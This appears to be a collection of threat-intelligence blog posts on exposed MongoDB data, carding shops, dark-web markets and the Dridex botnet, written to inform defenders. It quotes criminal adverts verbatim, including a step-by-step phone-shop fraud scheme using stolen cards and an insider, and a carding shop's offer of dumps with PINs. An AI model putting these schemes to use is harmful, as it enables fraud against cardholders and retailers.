Thankfully, MongoDB has attracted a lot of interest over the past few weeks. It's not a new problem; however, the more people report on it, the more C-level people will ask the question 'where is my MongoDB?'

John Matherly originally wrote about this in 2015. The topic has since been resurrected and will no doubt be resurrected again in another 12 months. A significant media outlet is taking note of this extortion practice, and for me, whilst painful for the victims, this is simply part of the stratagems associated with online survival.

There are circumstances in which you must sacrifice short-term objectives in order to gain the long-term goal. This is the scapegoat strategy whereby someone else suffers the consequences so that the rest do not.

So, with this in mind, let's take a look at the data currently available as of 05/01/17. Data will be redacted; I don't want the responsibility of dealing with the consequences if they are eventually extorted.

  • Job site

IP address, location, current job title

  • Health data

Passwords, DOB, weight, height, phone number, diabetic status, last login IP

  • An Android .APK backend for tracking users of a satellite app

Further data included network type, i.e. 3G or 2G

The Money Team - A multinational fraud gang

The thriving carding forums that reside under most .ru or .su domains offer a significant range of fraud options, from simple carding fraud using dumps or CVV dumps upwards. I identified 'The Money Team' by way of their preference for offering what are known as pink slips.

Pink slips are better known from financial dealings, and in particular from insurance firms. The fraudulent forms offered here target the following:

  • Alpha Insurance
  • CSG
  • FAC
  • Ingosstrakh - A Moscow-based entity with financial stability rating of A++

They offer a substantial amount of documentation via a DNM at the following prices, which are set on a sliding scale depending on the amount purchased, i.e. the more slips you buy, the lower the unit cost:

  • 1 completed application form - 2500r
  • 10 letterheads - 900p 
  • 20 forms - 870r 
  • 30 forms - 850r 
  • 50 forms - 700r 
  • 100 forms - 650r 
  • 300 forms - 550r 
  • 500 forms - 500r 
  • 1000 forms - 450r 
  • 5000 forms - 400r 
  • 10000 forms - 380r

As a potential buyer of the documents you can request a sample; a reputation as a buyer is required, and if you're feeling adventurous you can ask for a courier such as SDEK/DIMEX/CSE.

Branching out and diversifying a criminal enterprise is key to success, and the soon-to-be-launched site offers a direct link to their trades.

The site unsurprisingly sits behind CloudFlare.

I will be paying close attention to what other services pop up from TMT.


2016 a year in Review

Goodbye 2016

A year in security is a considerable amount of time; the number of breaches, attacks and disclosures has been almost non-stop, and we're not finished yet. I have listed below some of the most notable 'cyber' incidents which caught my eye, for a number of reasons.

  • HSBC Bank attacks - January
  • Operation Dust Storm - February
  • DROWN vulnerability - March
  • Panama Papers - April
  • RDP bruteforcing - May
  • Democratic Party hack - June, and of course the disappearance of Angler around the same time, and NATO recognising cyber as a '5th domain of warfare'
  • xDedic forum - July
  • ShadowBrokers 'dump' - August
  • Brian Krebs DDoS attack - September, and Congressional oversight releases the report on the OPM breach
  • Trickbot - October
  • Three data 'breach' - November
  • Avalanche takedown - December. Bonus video footage of the arrest here

No real surprises for those in the trenches of security. I've left out some of the more 'media friendly' stories as cyber became front page news this year, with every DDoS and breach impacting people who have zero idea how the incident will have occurred. Typically cloudy responses from the organisations affected do not help the affected or, more importantly, the victims.

What are companies doing to ensure this doesn't happen to them? The basics, plus the advanced, intelligence-led security endeavours that look for the potential attack vectors and methods being used elsewhere and derive intelligence from them. But the fact is most attacks are NOT sophisticated. This phrase is only tagged onto those incidents that make front page news, or as I call it, the BBC factor. I am a big fan of @thegrugq; for one, his clarity in tone on security along with his razor wit is good to see in security, and he is a poster boy for security snark who backs it up with proof.

The ultimate being this tweet:

New rule: if you are hacked via OWASP Top 10, you’re not allowed to call it “advanced” or “sophisticated.”


And he is so right. Tesco may have been hacked via a vulnerability in the back office system, or an insider offering access to his terminal for transactional access, but the fact remains that few of the breaches above were 'sophisticated':

  1. xDedic - bruteforcing RDP sessions
  2. Three Data incident - insider
  3. Panama Papers - SQL Injection
  4. Brian Krebs DDoS attacks - hardcoded passwords and insecure protocols in CCTV and DVR systems
  5. OPM breach - ignorance of the clear threats and lack of understanding from top to bottom, which resulted in the Oversight report and the person at the top losing her job.


2017 predictions are here, and I'm totally serious

Security predictions for 2̶0̶1̶7̶ 1998
1. Macro malware
2. MD5 passwords
3. Companies threatening security researchers for disclosures.

#Dridex has big ambitions..

Dridex, Dridex. The bane of so many people's lives, mine included. It had been 'quiet', and I made a post in the hope it had gone away. It had not. It has returned with a couple of new Botnet IDs, 144 and another, 1024, which I am still working on.

It includes a list of interesting targets.

The interesting part is the 'sgoldtrakpc' entry, which leads to this conclusion:

FPS GOLD provides core processing and eBanking software for community banks across the United States. We offer the solution to all of your banking challenges—including ever-changing regulations and security threats. And the FPS GOLD solution is fully integrated, saving you time and money.

The sample Matt posted and the one I was analysing both included a comprehensive list of commercial banking applications, and also an improved list of enterprise applications. The list is here; see the comments for the full list.

Samples used in analysis here & here.

Incidentally, Dridex has historically been delivered by a macro-enabled document. Microsoft recently backported a good solution for blocking these from downloading malicious payloads using this, but it was exclusive to Office 2016. Thankfully, it's now in Office 2013! Please install this patch ASAP.

Going shopping on the Dark web

I've recently learnt the impact of what we, the 'entrenched', take as the norm. Case in point:


To the vast majority of security people this is not 'news', but that doesn't take away the fact that it is equally important to those affected. Graham Cluley also has some thoughts on it here:

But what hackers frequently do these days is use a technique known as “credential stuffing” - taking the information they have stolen from one site, using it to log into another site, and then using any information they gather on any accounts they manage to access to gather additional personal information which could be used for fraud.


So with that in mind, I thought I would demonstrate what is available on one of the more popular 'Darknet Markets'. A primer on that area is here.

Firstly, most markets are usually quite accessible; a good list is here. There is an exception to the rule for some markets that require a deposit, or a cosign from someone legitimate enough to 'vouch' for you.

What can I buy?

Lots. You can usually identify the interesting things in much the same way as on most auction sites, by way of feedback. A quick rundown of some of the items, physical and virtual, and the services associated with them is below:

  • Banking

I wrote about muling here, but the services used in between these are not limited to muling; there are also:

  • Carding services - hotel fraud, such as booking services, and Ticketmaster gift cards.


Damaging to the brand associated with the theft & fraud.

  • Bank account transfers - often taken from compromised devices or those owned by a botnet.

  • British Airways accounts - often from RATted machines.

  • Weapons - Yes, you can order a weapon from the internet

Personal information is a commodity in itself and arguably the most valuable; however, its value depends on those who can best use it to gain the most profit. It's for sale here too, as mentioned in relation to the original O2 article.

The insider threat is something which is gaining a lot of attention and will only grow as an exponential threat to businesses who do not understand the concept.

This advert offers an insider in all of the UK's most popular phone stores:

Boggalertz - Best Seller in the world, just wait and see.

Please read this carefully************

To take advantage of these profiles you will need the following
1) An insider in any phone shop
2) A credit or debit card, which you know the pin and registered address for
3) there must be at least £10 on the card
4) This is for UK only

Here's how it works.......
* You send me the door number and the postcode of the registered card, EXCLUDING the LAST 2 LETTERS. ( SO I DON'T EVER KNOW THE ACTUAL ADDRESS)
* I will send you back a profile which will pass for mobile phones in ANY phone shop, providing you use the correct card
* You go to your insider and place orders for as many handsets as you can get your grubby little mitts on
* You leave me nice feedback and tell the world that BOGGALERTZ is the world's best seller!

You will need an insider because of 2 reasons
1) the DOB may not match what you or your striker looks like
2) the name will not match the name on the card (which I will never know)

Again, to the majority of the security community this is not a 'new' concept. However, encouraging mainstream media to take an active interest in this will highlight its availability and ensure that those at risk are better educated and understand the risks.

Tools of the trade: An intro.

I received an email from someone just starting out in security as a chosen career path who had bought a laptop to use purely for research. I don't particularly advocate any one laptop over another; I use a MacBook* for two reasons:

1. Resale value

2. The screen is amazing, and my eyesight is getting progressively worse.

I output a list of my tools and was surprised at just how much I had customised my device.

  • KnockKnock from Patrick Wardle, along with a lot of other tools, is available here. "KnockKnock... Who's There?" See what's persistently installed on your Mac. KnockKnock uncovers persistently installed software in order to generically reveal malware.
  • Little Snitch - essentially a firewall, but offers usability.
  • Hopper - disassembler for x86/x64 RE. Not free.
  • Radare - another disassembler, my personal preference.
  • Brew - it's amazing OSX comes without half these tools, but you'll quickly realise you need them.
  • Shodan command line - as above, really is part of everything I do.
  • Olevba - excellent parsing for OLE files, usually MS Office.

As an addendum, there is a brilliant 'hardening guide' for OSX here.

NOTE: this is for beginners; as a more seasoned security researcher you're probably used to seeing these tools and probably shouldn't be reading this.

*Other excellent laptops are available.

Inside an international Carding shop

There is a worldwide trade in stolen or compromised credit cards, which often end up in the hands of a few criminals who, instead of attempting to spend the cash themselves, choose to sell the content to those who can better 'cash out' and move the compromised content into account(s) that can essentially launder the cash. Muling and laundering reports from Europol are here and here.

Support manager shop (English) Please contact: ICQ ID: 684523892 Email: Yahoo: Chim_ThaiLan

The ICQ number 684523892 is associated with a large number of results, all relating to the trading of stolen/compromised credit card details. One such shop offers significant coverage including the US, China & EU.

There are two types of cards, referred to as 101 and 201:

201 = larger limits and no regional restrictions, but requires chip verification.

101 = restricted limits (preferred by criminals and those learning the carding game) and not chipped.

The rough translation of 'Chim_Thái_Lan' is 'Birds of Thailand', which could be a reference to the location of the carding operation in Asia; the shop offers assistance in both Thai & English, working between the hours of BST and +6 Thai time. When I asked for the rates and promised to purchase, I was faced with the following:

Thank u for interest!! rates below and promise value (:

- DUMPS 101 Track1+Track2+PIN.
- DUMPS 201 Track1+Track2+Track3+PIN.
- Daily update.
- Fast automatic payment methods
- Replace lost/stolen/hold/card error/call
- Replace if the card balance is less than $1,000
- Balance > 1,000 - 100,000 EUR/USD
- Lowest prices at a stuff of such quality.
- After purchase you will have 3 days to check
- Refunds
- Support 24/7


Not sure about doing business with these guys just yet; I'll consider my options.

Patchwork & The Dropping Elephant APT

Good work from Gadi and the team at Cymmetria & Kaspersky - the Cymmetria report is here, Kaspersky's here.

What struck me as odd, and reminded me of some of the work I looked at in May, was this line in the Kaspersky analysis:

it hides base64 encoded and encrypted control server locations in comments on legitimate web sites. However, unlike the previous actors, the encrypted data provides information about the next hop, or the true C2 for the backdoor, instead of initial commands.

This particular comment struck me because in early May I was analysing some malicious .pps documents I had received and identified a number of CVEs being used in them; they contained material related to government projects and political interests in SE Asia.

Example metadata from .pps leveraging CVEs

I was struggling to identify what type of campaign this was when I found that some of the C2 commands were being stored in blog comments on legitimate web sites, although these were completely unrelated to any political activity.

There is a lot of security research available on the political unrest in SE Asia and the South China Sea. A lot of the content available to research has been laid out by FireEye; the ongoing territorial disputes are being fought with a very competitive cyber theme.

Welcome back #Dridex

My most recent blog indicated we would see the back of Dridex & Locky; in hindsight it was a bit hopeful. P2P botnets do not die: the very principle they are built on offers a level of persistence that makes them near on impossible to remove.

It has 'returned' - hat tip to @malwaretech, who has significant fingers in pies with Necurs and can identify a lot of what Dridex is doing. I'm time-limited in terms of RE at the moment, but the changes in Dridex are, thankfully, being identified by Matt Mesa at Proofpoint.

What I have identified as a result of some recent changes is OS fingerprinting, which is new (to me at least): Dridex is actively identifying the OS running on the host.

So, the question for me: why is Dridex looking to fingerprint the OS? I observed some interesting checks in the macro too, including the number of documents opened previously (attempted sandbox evasion, I assume), but this is easily bypassed.

Goodbye #Dridex, good riddance #Locky

The Past

We will no doubt shortly see some official word on the 'takedown' of Dridex and/or Locky; it has been widely reported that the lack of daily spam campaigns indicates its disappearance is linked to the FSB operation. It's widely known that the FSB only get involved in cyber criminal activity when there is significant international pressure to investigate.

It's difficult not to draw logical conclusions from the timings of the two operations and the subsequent disappearance of Dridex/Locky, but it's unlikely that Russia would be directly involved in a 'takedown' operation of a significant botnet which was responsible for the theft of money from banking institutions.

During the period from mid-2015 to the present day, 18 targeted attacks have been recorded across the country at bank customers’ automated workstations. The damage caused has exceeded 3 billion rubles. The police have prevented potential damage in the amount of 2 billion 273 million rubles.
— https://xn--80agyg.xn--b1aew.xn--p1ai/news/item/7894434/

The FSB & MIA worked with Sberbank to conduct this operation, and the reports from Russian intelligence indicate around 2.2 billion rubles were lost between October 2015 and March 2016, which ironically is the same time as the Smilex arrest; he was in Cyprus at the time, originally from Moldova.

The Present

  • Vawtrak/Hancitor/H1N1
  • Vawtrak = banking trojan, AKA Neverquest
  • Hancitor = dropper, usually delivered by a macro
  • H1N1 = loader, with UAC bypass (with some additional checks for GetCurrentProcess, and a nice crash) - thanks to the geniuses on KernelMode

Identifying Hancitor was done post-infection in my lab - thanks to Matt as ever.

A really great overview is here from Proofpoint, and a sample here.